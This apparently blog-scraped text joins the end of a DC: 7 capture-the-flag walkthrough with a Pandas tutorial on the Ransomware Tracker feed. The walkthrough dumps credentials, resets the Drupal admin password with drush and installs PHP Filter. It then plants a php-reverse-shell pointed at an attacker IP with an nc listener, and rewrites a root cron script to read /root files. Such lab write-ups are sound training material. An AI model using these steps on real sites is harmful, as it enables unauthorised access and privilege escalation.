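The table-name search above can also be scripted. The sketch below assumes the dump follows mysqldump's layout (which, as far as I know, drush sql-dump relies on for MySQL databases), where each table definition is preceded by a comment line such as -- Table structure for table `users`. It reads the file line by line, so a 380 MB dump does not need to fit in memory.

```python
import re

# mysqldump writes a comment line like this before each table definition:
#   -- Table structure for table `users`
TABLE_RE = re.compile(r"^-- Table structure for table `([^`]+)`")


def table_names(lines) -> list:
    """Return table names in the order they appear in the dump."""
    names = []
    for line in lines:
        match = TABLE_RE.match(line)
        if match:
            names.append(match.group(1))
    return names


# Usage (path from this walkthrough):
# with open("/tmp/arj/website.sql", encoding="utf-8", errors="replace") as dump:
#     print([t for t in table_names(dump) if t.startswith("users")])
```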

Now, my solution is neither the cleanest nor most efficient… but I wanted the credentials and this worked.

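cat website.sql | grep -A 30 'Table structure for table `users`'

The -A option prints the given number of lines after each matching line. Note the single quotes: inside double quotes, bash would treat the backticks as command substitution and mangle the search pattern. We can conclude that the users table does not contain credentials. Moving on to users_data using the command: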

cat website.sql | grep -A 30 'Table structure for table `users_data`'

Nope, nothing. Moving on to the final table users_field_data using the command:

cat website.sql | grep -A 30 'Table structure for table `users_field_data`'

Woohoo! The table users_field_data contains name, pass, mail and other user-specific fields. Let’s expand the grep and view some data!

cat website.sql | grep -A 40 'Table structure for table `users_field_data`'

As seen above in the screenshot, we got credentials for admin and dc7user. The only problem was that the passwords were hashed. I tried cracking the hashes online in the hope that they were known values, but there was nothing!

At this point, I was stuck and pondered about the next step.

The motive was still to become www-data and modify the cron script to get the flag. I proceeded with some research about Drupal. Specifically, I was trying to find a way to change the password of an existing user since I confirmed the existence of 2 users - admin and dc7user.

Interestingly, I found that the drush tool for Drupal is pretty useful when it comes to changing the password of admin. The syntax was simple:

drush user-password USERNAME --password="SOMEPASSWORD"

I decided to try it… why not?

drush user-password admin --password="SOMEPASSWORD"

Hmm, an error.

Some googling and research later, I discovered that drush has to be executed from the Drupal root directory, /var/www/html, so that it can find and bootstrap the site.

I decided to try it out.

Success!

I just changed the password of admin to SOMEPASSWORD. Let’s login to Drupal!

Yeah! We are in!

So far so good. The next step is to establish a reverse shell. The php-reverse-shell seemed like a viable option. The question was - how can we upload PHP code on Drupal?

WordPress has taught me that themes, modules, and plugins are typical vectors. I decided to do some research. You know, Google-for-the-soul.

In my googling, I came across a wonderful article titled Drupal to Reverse Shell describing how we can work with an authenticated Drupal interface to upload PHP code and establish a reverse shell session. However, there was a problem.

The article achieves a reverse shell by enabling a Drupal module called PHP filter. The documentation contains an interesting snippet:

The PHP filter core module has been removed from core starting with version 8.x.

Our victim machine is running Drupal 8.7.x and does not come with the PHP filter module. But… there is always a way. Manual installation!

This link contains a .tar.gz download which can be directly uploaded to Drupal as admin.

I proceeded by downloading the .tar.gz module file on my attack machine. Don’t forget to check the networking settings. I switched mine from host-only networking to NAT for just a second.

Time to install the new module!

On the Extend page, I clicked on the + Install new module button.

I clicked on the Browse button under Upload a module or theme archive to install and clicked on the Install button.

Woohoo! Installed successfully. Let’s move on!

I clicked on Enable newly added modules, which brought me back to the Extend page. Here, I scrolled down and selected the checkbox next to PHP Filter to enable it.

Next, scroll down completely and click on the Install button to reflect the changes on Drupal.

Great! We installed PHP filter. The next step is to use it to upload the php-reverse-shell code. To achieve this, I decided to create a new post on Drupal.

Important steps to follow:

Select the Text format as PHP code
Copy the php-reverse-shell code to the Body. On Kali Linux, it can be found in /usr/share/laudanum/php/php-reverse-shell.php
Edit the php-reverse-shell code and modify the following lines:

$ip = '192.168.56.102'; // Attack machine IP
$port = 8888; // Desired port

Open a shell and run nc -lvp 8888 on the attack machine to listen for a reverse shell

Once these steps are completed, click on the Preview button and watch the magic unfold!

Reverse shell! I am finally www-data. Hooray!

Okay… back to the game plan. We simply need to modify /opt/scripts/backups.sh with the following lines of code:

#!/bin/bash
cat /root/* > /tmp/arj/flag.txt

Once this was done, I simply monitored my temporary directory /tmp/arj for a file called flag.txt.

Yeah! There you have it. We did it :)

My Thoughts

That was absolutely crazy! I never expected anything less from @DCAU.

For me, DC: 7 was all about thinking outside the box and reinforcing good practices. Owning a box running Drupal was an added bonus because of all its details and intricacies.

I owe credit to @DCAU for an initial hint about the Twitter handle. Most CTF challenges lack an OSINT component, which is a known gap that deserves attention. With more challenges like this one, I am sure that I can build my skills.

As always, I cannot wait for the next one in the DC series!

If you enjoyed reading this, please check out my DC: 6 walkthrough and DC: 3 walkthrough which are challenges by @DCAU in the DC series.

Practical Python Pandas

2019-07-19T00:00:00+00:00

In this tutorial, we will learn how to use Pandas - a must-have Python module for Data Analysis and Data Visualization with a real-world example from the Cyber Security domain.

Note: Ransomware Tracker has not been operational since 08 December 2019. Readers are still encouraged to apply the concepts and the Jupyter Notebook available in this tutorial.

Introduction

Ransomware Tracker by abuse.ch is a website which tracks and monitors hosts and URLs associated with known Ransomware.

The website maintains a tracker which is frequently updated with threat intelligence associated with known Ransomware families. The screenshot below shows an interactive table on the Ransomware Tracker website populated with Ransomware threat intelligence.

The most interesting feature of Ransomware Tracker is the availability of a feed in the CSV (Comma Separated Values) format which allows us to easily capture and utilize this intelligence.

The screenshot below shows the Ransomware Tracker data in its raw CSV format accessible via the URL - https://ransomwaretracker.abuse.ch/feeds/csv/

Our objective is to read, parse, and generate insights from this Ransomware Tracker data using Python with Pandas.

Getting Started

For the purpose of this tutorial, we will use a Jupyter Notebook to write Python code and produce output. Here is a complete, easy to understand introduction to Jupyter Notebooks and how to get started.

The first step is to fetch the data.

As mentioned earlier, our data resides online as a CSV document. Pandas provides us with the read_csv function to read CSV data and store it into a DataFrame structure.

import pandas as pd
url = "https://ransomwaretracker.abuse.ch/feeds/csv/"
df = pd.read_csv(url, skiprows=8, encoding="latin-1")

We start by importing the Pandas module and referencing it as pd instead of pandas. This is a personal preference, but the pd alias is also a widely used convention in tutorials online.

Next, we initialize a variable url with the Ransomware Tracker CSV URL. This variable has a data type of str.

Finally, we call pd.read_csv with the following arguments:

url - location where our CSV feed resides (required)
skiprows - number of rows to skip from the top of the CSV document (in our case the first 8 lines are comments)
encoding - text encoding to be used
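Because the feed is offline, here is a minimal sketch of the same read_csv call against a small in-memory stand-in. The comment lines, the rows, and the "Société Exemple" registrar value are hypothetical; the bytes are encoded as Latin-1 so that encoding="latin-1" has a non-ASCII character to decode.

```python
import io

import pandas as pd

# Hypothetical stand-in for the offline feed: two comment lines, then a
# header row (which itself starts with "#") and two data rows.
text = (
    "# Ransomware Tracker stand-in (hypothetical comment)\n"
    "# Generated for this example only (hypothetical comment)\n"
    "# Firstseen (UTC),Threat,Registrar\n"
    "2018-08-12 00:46:13,C2,Société Exemple\n"
    "2016-03-01 09:15:00,Payment Site,\n"
)
raw = io.BytesIO(text.encode("latin-1"))

# skiprows=2 skips the two comment lines, so the next line becomes the header.
# The empty Registrar field in the last row is parsed as NaN.
df = pd.read_csv(raw, skiprows=2, encoding="latin-1")

print(df.shape)          # (2, 3)
print(list(df.columns))  # ['# Firstseen (UTC)', 'Threat', 'Registrar']
```

With the real feed, the same idea applies with skiprows=8, since its first 8 lines are comments.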

Now, we have df (our DataFrame) with the data loaded from the URL. Let us validate the data and its structure.

df.shape
# (13866, 10)
df.head()

df.head() prints the first 5 rows of the DataFrame by default. You can change this by specifying the required number of rows as an argument. Hence, df.head(n) will print the first n rows of the DataFrame.

Next, we inspect the bottom rows of the DataFrame. This is good practice for large datasets such as Ransomware Tracker, which has over 13,000 rows of data.

df.tail()

In our output, we can confirm the following facts:

The DataFrame recognized the header names
All fields are parsed correctly and unavailable fields are replaced with NaN value
The last row is a comment and needs to be removed

To remove the last row of the DataFrame, we can use a simple one-liner from Pandas:

df.drop(df.tail(1).index, inplace=True)
df.tail()

Great!

Now, the df.shape command should return (13865, 10) since we removed the last row of the DataFrame.
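To see the drop in isolation, here is a minimal sketch on a hypothetical three-row DataFrame whose last row mimics a trailing comment. It also shows df.iloc[:-1], a positional alternative (not the tutorial's approach) that returns a new DataFrame instead of modifying one in place.

```python
import pandas as pd

# Hypothetical data: the last row mimics a trailing comment line in the feed.
df = pd.DataFrame({
    "Threat": ["C2", "Payment Site", "# END (hypothetical comment)"],
    "Malware": ["Locky", "Cerber", None],
})

# Option 1 (as in the tutorial): drop the index label of the last row in place.
df_a = df.copy()
df_a.drop(df_a.tail(1).index, inplace=True)

# Option 2: positional slicing returns a new DataFrame without the last row.
df_b = df.iloc[:-1]

print(df_a.shape)         # (2, 2)
print(df_a.equals(df_b))  # True
```

Note that drop works on index labels, so it relies on the default, unique RangeIndex; iloc works on positions regardless of the index.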

Data Transformation

The next step involves manipulating and transforming the data in our DataFrame.

Let’s start with fixing the header names (also known as column names) of the DataFrame. To do this, we start by retrieving the list of existing header names.

list(df.columns)
'''
['# Firstseen (UTC)',
 'Threat',
 'Malware',
 'Host',
 'URL',
 'Status',
 'Registrar',
 'IP address(es)',
 'ASN(s)',
 'Country']
'''

I decided to make the DataFrame easier to read and comprehend with the following header name changes.

Old: # Firstseen (UTC)
New: Firstseen
Old: IP address(es)
New: IPs
Old: ASN(s)
New: ASNs

To accomplish this, we can use the df.rename function as follows.

columns = {'# Firstseen (UTC)': 'Firstseen', 'IP address(es)': 'IPs', 'ASN(s)':'ASNs'}
df = df.rename(columns=columns)
df.head()
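A minimal sketch of the same rename on a hypothetical one-row DataFrame that uses the feed's original header names. Columns not listed in the mapping (such as Threat) keep their names, and by default rename silently ignores mapping keys that match no column.

```python
import pandas as pd

# Hypothetical one-row DataFrame using the feed's original header names.
df = pd.DataFrame(
    [["2018-08-12 00:46:13", "C2", "192.0.2.1", "64496", "US"]],
    columns=["# Firstseen (UTC)", "Threat", "IP address(es)", "ASN(s)", "Country"],
)

# Map old header names to new ones; unlisted columns stay unchanged.
columns = {"# Firstseen (UTC)": "Firstseen", "IP address(es)": "IPs", "ASN(s)": "ASNs"}
df = df.rename(columns=columns)

print(list(df.columns))  # ['Firstseen', 'Threat', 'IPs', 'ASNs', 'Country']
```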

The Firstseen column in our DataFrame can provide us with a wealth of knowledge.

However, the values available consist of a date and time. We simply want the date. This requires a transformation of the values in the Firstseen column in our DataFrame.

Before we apply the solution to the whole DataFrame, let us shift perspective and consider a single value from the Firstseen column, for example 2018-08-12 00:46:13.

s_dt = '2018-08-12 00:46:13'
type(s_dt)
# str

The goal is to transform this value into our desired format. I chose the DD-MM-YYYY format, which turns this value into 12-08-2018. How can we do this?

Python provides us with a useful module called datetime for this exact purpose. We can leverage the datetime.strptime function to convert s_dt (a str object) to a datetime object as follows.

import datetime
o_dt = datetime.datetime.strptime(s_dt,'%Y-%m-%d %H:%M:%S')
type(o_dt)
# datetime.datetime

Now, we construct our desired format DD-MM-YYYY using the datetime.strftime function and o_dt (the datetime object) as follows.

s1_dt = o_dt.strftime("%d-%m-%Y")
s1_dt
# '12-08-2018'
type(s1_dt)
# str

Easy! We successfully transformed one string, but what about an entire DataFrame column?

To achieve this, we can use the apply method. When called on a single column (a pandas Series), apply calls the given function on each element of that column. For the function itself, I chose to write a lambda function (also known as an anonymous function).

df['Firstseen'] = df['Firstseen'].apply(lambda x: datetime.datetime.strptime(x,'%Y-%m-%d %H:%M:%S').strftime("%d-%m-%Y"))
df.head()

Voila! Let us dissect the above command…

df['Firstseen'].apply(lambda x: datetime.datetime.strptime(x,'%Y-%m-%d %H:%M:%S').strftime("%d-%m-%Y"))

Here:

df['Firstseen'] refers to the column Firstseen in the DataFrame df
lambda x: datetime.datetime.strptime(x,'%Y-%m-%d %H:%M:%S').strftime("%d-%m-%Y") is our lambda function.
- The x in lambda x references each element in the Firstseen column.
- datetime.datetime.strptime(x,'%Y-%m-%d %H:%M:%S') converts each x (str object) to a datetime object using the provided format.
- strftime("%d-%m-%Y") then converts each datetime object back to str in the provided format (DD-MM-YYYY).
We apply this lambda function to every element of the Firstseen column using the apply method

The biggest takeaway: always get the desired transformation working on a single element before applying it to the whole DataFrame.
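For comparison, here is a sketch of a vectorized alternative (a swapped-in technique, not the tutorial's own): pd.to_datetime parses the whole column with an explicit format, and .dt.strftime formats it back to strings. The sample values are hypothetical. On large columns this is often faster than a Python-level lambda, but both produce the same strings here.

```python
import datetime

import pandas as pd

# Hypothetical sample of Firstseen values in the feed's original format.
df = pd.DataFrame({"Firstseen": ["2018-08-12 00:46:13", "2016-03-01 09:15:00"]})
fmt_in = "%Y-%m-%d %H:%M:%S"

# Element-wise approach used in this tutorial.
via_apply = df["Firstseen"].apply(
    lambda x: datetime.datetime.strptime(x, fmt_in).strftime("%d-%m-%Y")
)

# Vectorized alternative: parse the whole column once, then format it.
via_vectorized = pd.to_datetime(df["Firstseen"], format=fmt_in).dt.strftime("%d-%m-%Y")

print(via_apply.tolist())       # ['12-08-2018', '01-03-2016']
print(via_vectorized.tolist())  # ['12-08-2018', '01-03-2016']
```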

Querying

The next step is to query the DataFrame and generate valuable insights. In this step, I aim to use Pandas to perform operations on the DataFrame, extract output, and visualize the results.

Query 1: Number of entries per threat

In this query, we want to categorize our dataset based on the Threat field. This basically involves a group by operation followed by aggregation and sorting. I write the query as follows.

df.groupby('Threat').size().sort_values(ascending=False)
'''
Threat
Distribution Site    11297
Payment Site          1660
C2                     908
dtype: int64
'''

Interesting! The output indicates the existence of 3 threats: Distribution Site, Payment Site, and C2 (Command and Control Site). As seen in the query, we chain several Pandas methods (groupby, size, and sort_values) to manipulate the data.
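The groupby/size/sort_values chain can be checked on a small hypothetical sample of the Threat column. As a side note (an alternative, not the tutorial's query), value_counts() returns the same counts already sorted in descending order; both skip rows where Threat is missing by default.

```python
import pandas as pd

# Hypothetical sample of the Threat column.
df = pd.DataFrame({"Threat": ["Distribution Site", "C2", "Distribution Site",
                              "Payment Site", "Distribution Site", "C2"]})

# The tutorial's chain: group rows by Threat, count rows per group, sort descending.
by_groupby = df.groupby("Threat").size().sort_values(ascending=False)

# Alternative: value_counts() on the column gives the same counts.
by_value_counts = df["Threat"].value_counts()

print(by_groupby.index.tolist())  # ['Distribution Site', 'C2', 'Payment Site']
print(by_groupby.tolist())        # [3, 2, 1]
```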

Now, how about a visualization?

Visualization of data in Python can be achieved with a variety of libraries such as Matplotlib, Seaborn, and ggplot. Read more here.

Pandas comes with a built-in plot method (df.plot) that exposes useful plotting abilities. Under the hood, df.plot uses Matplotlib as its default plotting backend.

Let’s create a simple horizontal bar graph to illustrate the different categories of threats and their counts. The query is as follows.

df.groupby(['Threat']).size().sort_values(ascending=False).plot(kind='barh')

The plot method is an effective tool for generating useful graphs. In our simple example above, we pass kind='barh' to request a horizontal bar graph.

Query 2: Yearly trend in malware

For the next query, I decided to play with the Firstseen field of the DataFrame. A valuable tip is to always attempt trend analysis if the dataset contains date/time fields.

This query is slightly more complex than the previous one. The first transformation creates a new DataFrame column called Firstseen_year, which captures and stores the “year” from each Firstseen element. We accomplish this with a custom lambda function.

df['Firstseen_year'] = df['Firstseen'].apply(lambda x: datetime.datetime.strptime(x,'%d-%m-%Y').strftime("%Y"))

Before we continue, let us understand the dtypes or data types of elements within our DataFrame using the following command.

df.dtypes
'''
Firstseen         object
Threat            object
Malware           object
Host              object
URL               object
Status            object
Registrar         object
IPs               object
ASNs              object
Country           object
Firstseen_year    object
dtype: object
'''

As seen above, every column has the object dtype, which pandas uses for columns that hold arbitrary Python objects; in our case, those objects are str values. When working with date/time elements, it is strongly recommended to convert them to a suitable data type. This matters especially for operations such as sorting.

One mechanism to change the dtype of a column is to use the df.astype function as follows.

df['Firstseen_year'] = df['Firstseen_year'].astype('datetime64[ns]')
df.dtypes
'''
Firstseen                 object
Threat                    object
Malware                   object
Host                      object
URL                       object
Status                    object
Registrar                 object
IPs                       object
ASNs                      object
Country                   object
Firstseen_year    datetime64[ns]
dtype: object
'''

Great! Our DataFrame column Firstseen_year now has data type as datetime64[ns].

Although this is the correct way to work with date/time elements, the conversion has a notable side effect. Let us take a look at the contents of the DataFrame df.

df[['Firstseen','Firstseen_year']].head()

As we can see, once we extract 2018 from 12-08-2018 and convert it to the datetime64[ns] data type, we end up with 2018-01-01.

While this makes sense, it does not match our desired format, i.e., the year only: we need 2018 rather than 2018-01-01. But how?

Simple!

Since df['Firstseen_year'] is of the data type datetime64[ns], we can extract the “year” part of the date/time object as follows.

df['Firstseen_year'] = df['Firstseen_year'].dt.year
df[['Firstseen','Firstseen_year']].head()
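As a possible shortcut (a swapped-in technique, not the tutorial's own steps), the year can be extracted in one pass by parsing Firstseen, already in DD-MM-YYYY form, with pd.to_datetime and reading .dt.year, which skips the intermediate string column. The sample values are hypothetical. The sketch also reproduces the side effect described above: parsing a bare year yields January 1 of that year. Depending on the pandas version, the integer dtype may be int64 or int32 (newer pandas releases return int32 for .dt.year).

```python
import pandas as pd

# Hypothetical Firstseen values, already transformed to DD-MM-YYYY.
df = pd.DataFrame({"Firstseen": ["12-08-2018", "01-03-2016", "30-11-2017"]})

# Parse the full date once and extract the year as an integer column.
df["Firstseen_year"] = pd.to_datetime(df["Firstseen"], format="%d-%m-%Y").dt.year
print(df["Firstseen_year"].tolist())  # [2018, 2016, 2017]

# For comparison: a bare year string parses to January 1 of that year.
bare_year = pd.to_datetime(pd.Series(["2018"]), format="%Y").iloc[0]
print(bare_year)  # 2018-01-01 00:00:00
```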

Wait, what about the data types?

df.dtypes
'''
Firstseen         object
Threat            object
Malware           object
Host              object
URL               object
Status            object
Registrar         object
IPs               object
ASNs              object
Country           object
Firstseen_year     int64
dtype: object
'''

As we can see, Firstseen_year column has int64 values. Now, operations such as sorting can be achieved accurately. Back to the query!

ax = df[['Firstseen_year','Malware']].groupby('Firstseen_year').count().sort_values(by='Firstseen_year', ascending=False).plot(kind='area', figsize=(20,5))
ax.set_xlabel("Firstseen Year")
ax.set_ylabel("Number of Malware")
ax.set_title("Yearly Malware Trend - Ransomware Tracker")

The above query includes many useful features of the plot method. It produces an area graph (kind='area'), and the figsize=(20,5) argument sets the figure size as (width, height) in inches.

No graph is complete without appropriate x and y labels. The plot method returns a Matplotlib Axes object (ax), whose set_xlabel and set_ylabel methods define these labels and whose set_title method sets the graph title.
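The data behind this graph can be inspected without plotting. This minimal sketch uses hypothetical rows, one of which has a missing Malware value, to show how count() (used in the query) differs from size(): count() counts only non-missing Malware values per year, while size() counts every row. sort_index() is used here to order the years ascending, an illustrative choice rather than the tutorial's sort.

```python
import pandas as pd

# Hypothetical rows; the 2018 row has no Malware value.
df = pd.DataFrame({
    "Firstseen_year": [2016, 2016, 2017, 2018, 2016],
    "Malware": ["Locky", "Cerber", "Locky", None, "TeslaCrypt"],
})

# count(): non-missing Malware values per year.
per_year_count = df.groupby("Firstseen_year")["Malware"].count().sort_index()

# size(): all rows per year, including the one with missing Malware.
per_year_size = df.groupby("Firstseen_year").size().sort_index()

print(per_year_count.tolist())  # [3, 1, 0]
print(per_year_size.tolist())   # [3, 1, 1]
```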

Query 3: Number of malware per threat per year

For the next query, I decided to try something slightly more complex by using two fields: Firstseen_year and Threat.

To achieve this, we pass both columns to a single groupby call and then count the rows in each (year, threat) group with size().

df.groupby(['Firstseen_year','Threat']).size()
'''
Firstseen_year  Threat           
2015            C2                      37
2016            C2                     709
                Distribution Site    10441
                Payment Site          1346
2017            C2                     140
                Distribution Site      843
                Payment Site           314
2018            C2                      22
                Distribution Site       13
dtype: int64
'''

The insights generated here are extremely valuable. Grouping by several columns with groupby is a common way to explore relationships between fields. Visualizing the results would be the icing on the cake!

Let’s visualize the data as follows.

ax = df.groupby(['Firstseen_year','Threat']).size().unstack().plot(kind='area',stacked=True,figsize=(20,5))
ax.set_xlabel("Firstseen Year")
ax.set_ylabel("Number of Malware")
ax.set_title("Malware per Threat per Year - Ransomware Tracker")

The above query first calls unstack(), which pivots the Threat level of the grouped index into columns so that each threat becomes its own series. It then draws an area plot (kind='area') with the areas stacked on top of each other (stacked=True), which makes the per-year totals easier to read.

Again, we utilize the set_xlabel and set_ylabel functions to correctly label the graph. This is always recommended!
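The reshaping step that feeds this graph can be checked on hypothetical rows. groupby on two columns yields a Series with a two-level index; unstack() then turns the Threat level into columns. The fill_value=0 argument is an addition for this sketch: without it, (year, threat) pairs that never occur appear as NaN.

```python
import pandas as pd

# Hypothetical rows covering two years and three threat types.
df = pd.DataFrame({
    "Firstseen_year": [2016, 2016, 2016, 2017, 2017],
    "Threat": ["C2", "Distribution Site", "Distribution Site", "C2", "Payment Site"],
})

# One value per (year, threat) pair, indexed by a two-level MultiIndex.
counts = df.groupby(["Firstseen_year", "Threat"]).size()

# unstack() moves the Threat level into columns; missing pairs
# (e.g. 2016 / Payment Site) are filled with 0 instead of NaN.
table = counts.unstack(fill_value=0)

print(table)
```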

Conclusion

In this tutorial, we explored Pandas, the de facto Python module in a Data Analyst’s toolkit.

Using the practical example of Ransomware Tracker data, we went through the steps involved in ingesting, cleaning, parsing, querying, and visualizing data to generate powerful insights.

You can view and download a Jupyter Notebook with everything highlighted in this tutorial from here.

Key takeaways include:

Always be curious about data. In Cyber Security, we are surrounded by tons of valuable data - logs, threat intelligence, etc. You never know what you will find.
Leverage modern technologies such as Python, Jupyter Notebooks, GitHub, etc. to write code, visualize graphs, and share with others.
Within Python, explore visualization libraries and modules such as Seaborn, Plotly, Bokeh, and Matplotlib. Depending on the scenario, one of them may be a much better fit than the others.
Try to correlate various datasets. For more advanced analytics, play with multiple datasets. In our example, we used only one dataset, the Ransomware Tracker feed. In the real world, you might face multiple datasets. As challenging as it sounds, the reward (the insights generated) is usually worth it.

I hope you enjoyed reading this. Please email me with questions.


What is `vssadmin`?